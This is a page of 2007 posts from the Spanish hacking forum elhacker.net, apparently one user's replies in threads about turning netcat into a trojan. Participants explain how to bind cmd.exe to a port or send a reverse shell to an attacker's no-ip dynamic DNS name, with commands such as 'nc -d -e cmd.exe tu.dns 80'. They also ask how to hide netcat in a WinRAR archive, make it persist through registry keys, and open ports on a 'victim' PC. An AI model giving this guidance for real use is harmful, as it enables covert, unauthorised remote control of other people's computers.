elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Hacking / Re: Jugando con netcat en: 11 Septiembre 2007, 23:23 pm
[EDITADO]

Problema arreglado, yo y mi estupidez :P

y como solucionastes ese problema, me imagino q el problema era en donde ponias el netcat o cual era el problema??
12  Seguridad Informática / Hacking / Re: NetCat en: 28 Agosto 2007, 05:22 am
Alguien me ayuda a crear el netcat-troyanizado cn el winrar¿¿?¿? sk no lo consigo...m consegui conectar a otras pc´s d una forma menos hortodoxa i miren....

Código:
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\owner>nc -vv -L -p 80
listening on [any] 80 ...
connect to [213.60.90.57] from cm202198.red83-165.mundo-r.com [83.165.202.198] 2
206
jaja
echo jaja
p**a!!
cabron
¬¬
start cmd

No puedo usar comandos...k pasa¿?¿?

Pero m interesa saber crear el netcat-troyanizado por completo...añadiendo al registro de windows kn reg add....

Solo pido ayuda porfavor>>>><<<<gracias de anticipado!

veo q quieres usar los comandos y poniendo netcat  a la escucha veo q tu error esta a la hora de escribirlo mas bien pruba poniendolo asi: nc -l -d -e cmd.exe -p ? el signo es para q pongas el puerto  quieras, y si vas  a usr solo comandos podrias usar el puerto 6000 sirve de q le das una revisada

saludos!!
13  Seguridad Informática / Hacking / Re: NetCat en: 26 Agosto 2007, 23:37 pm
A mi me dice acceso denegado  :huh: :-(

gurdalo dentro de la carpeta sysem32, es decir:

disco duro\windows\system32   ahi lo guardas y despues lo abres como ya te mencionaban y listo y usa tu imaginacion para hacer lo q quieras y ademas encontraras unos muy buenos manuales sobre netcat y si no encuentras uno chido ay avisa

saludos!!
14  Seguridad Informática / Hacking / Re: Jugando con netcat en: 17 Agosto 2007, 19:23 pm
creo q si pones el de ISP no se conecta a la pc esacta q tu quieres por eso te recomiendo q mejor la no-ip, si usas la de tu pc dentro de la lan el usar netcat para hacer una shell funcionara siempre y cuando lo intentes hacer dentro de la lan o wlan si lo q quiere es usarla fuera de tu red usa la no-ip o pon a la escucha y no en tu pc si no en la otra un minuto en el registro y as las modificaciones.


no se si me exlpique bien, y si no ps aqui estoy!!
15  Seguridad Informática / Hacking / Re: Jugando con netcat en: 16 Agosto 2007, 19:01 pm
Buenas a todos!! soy  nuevo en el foro y me llama bastante la atencion esto de poder troyanizar el netcat, pero sin embargo tengo un problema, y es que no soy capaz de hacerlo funcionar.
El problema viene porque mi pc está tras una Lan controlada por un router wifi, de manera q cuando especifico mi IP en el netcat pongo la pública que me ofrece mi proveedor de internet y parece q este es el problema ya que si pongo la del localhost siq me funciona perfectamente.
Espero que me puedan ayudar...y no estaría nada mal saber como se utiliza el type como pone en la primera pagina del post  ;D

Un saludo a todos.

yo te recomiendo que mejor agas que se conecte a una direccion dns y asla con no-ip lee mas sobre no-ip y veras que te puede funcionar, asla pruba y dinos si te funciona!!


saludos!
16  Seguridad Informática / Hacking / Re: Jugando con netcat en: 14 Agosto 2007, 19:06 pm
D4RIO

ps gracias por la paciencia y la informacion usare mi imaginacion y aver q pasa y aversi logro poder poner en practica lo q se asta ahora.

saludos, e igual, feliz hacking!!
17  Seguridad Informática / Hacking / Re: Jugando con netcat en: 13 Agosto 2007, 23:42 pm
una ultima duda nc -d -e cmd.exe tu.dns 80 , eso puedo ponerlo en el regisro o solamente cuando abra netcat??

hoy intente hacer una shell usado el puerto 6000 pero no podia usar el comando dir lo unico q pasaba esq cuando escribia algo en nc aparesia en el de el y viceversa, tambien lo intente usando los puertos 25 y 80 y ocurria lo mismo, cual podria ser el problema??
18  Seguridad Informática / Hacking / Re: Jugando con netcat en: 13 Agosto 2007, 05:20 am
Respondiendo a @ron:
no-ip.org es un servicio de DNS. Eso significa que es un proveedor de nombres de dominio. Vos tenes una cuenta en no-ip y ellos asocian tu última IP a un nombre de subdominio que es por ejemplo, en mi caso, darioweb.no-ip.org.

El servicio funciona por dos partes. El servidor que provee el servicio de DNS y el cliente, o sea vos. Tu programa cliente de no-ip provee al servidor de tu última IP para que así ese subdominio DNS se asigne a ella. Así para cualquier cosa que necesites tu IP podés usar el DNS, sea un servidor web o tomar una shell.

Entonces si instalas el cliente de no-ip en otra PC y accedes los datos de tu cuenta de no-ip la IP a la que se asignará el DNS será la de la otra PC. Así es que podés usar cualquier PC para tomar una misma shell.

Y si querés hacer una conexión para ambos lados????  Es simple. Usas netcat para mandarte el IP de la otra persona por E-Mail !!!!!!  XD


y puedo poner en el regisro, q netcat se conecte a un direccion dns, como lo pondria?? y yo solo tendria q poner netcat a la escucha y abrir mi no-ip cambiar la direccion ip de mi duc mas reciente q seria de la q estaria usando actualmente y se conectaria, y ya esta y funcionaria??
19  Seguridad Informática / Hacking / Re: Jugando con netcat en: 6 Agosto 2007, 23:52 pm
Hola, no podes conectarte a una PC que este a la escucha y tomarle la shell asi como asi, es decir, es necesario que esa PC se conecte a la tuya con el paramentro -e establecido, (en Linux podria ser -c)...Lo que podes hacer es hacerte una cuenta en NO-IP y usar tu DNS desde cualquier PC. Así no importa desde dónde te conectes, la máquina siempre se intentaría conectar a tu DNS y por lo tanto tendrías éxito desde cualquier PC.

se intentará conectar a mi DNS pero la q ise con no-ip o se conectara con la no-ip de la compu donde abra mi no-ip ya instalado??

y entonces despues de eso pongo NetCat a la escucha y la compu se conectara a la mia??

quisiera abrir dos puertos en la pc victima pero como tendria q ponerlo en el registro (regedit), asi para poder enviar archivos y eso??

no entiendo muy bien como esq se conecta a mi no-ip, algunas veces tienes una ip y despues la puedes actualizar a la q tiene actualmente la pc pero eso no proboca ningun daño a la hora de usar la DNS para hacer una shell??

y si no es mucha molestia me podias explicar un poco el como funciona la no-ip a la hora de usarla ps aunq e leido del tema no lo entiendo pero lo puedo hacer y no es suficiente para mi!!

gracias y ojala me des una solucion
20  Seguridad Informática / Hacking / Re: Jugando con netcat en: 5 Agosto 2007, 21:45 pm
esta my bueno el post pero, quiero poner netcat a la escucha en una pc dentro de una lan y q tiene ip estatica, pero aclaro a la escucha, si desde fuera de la lan yo intentara acceder a esa pc dentro de la lan conociendo su direccion ip pero de la pc q esta dentro de la lan, creo yo q no se podria acceder ps esa direccion ip puede estar duplicada dentro de la gran red "internet" entonces q podria hacer??

podria poner la direccion ip del router y despues acceder a la pc dentro de la lan pero creo q de esa forma no funcionaria, y asiq tendria mejor q hacer q la pc se conectara a una ip osea la mia, pero yo quiero ponerla a la escucha para q desde cualquier conpu me conectara a esa pc.  como podria hacerlo??

espero q me alla podido eplicar bien y ojala me contesten rapido
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines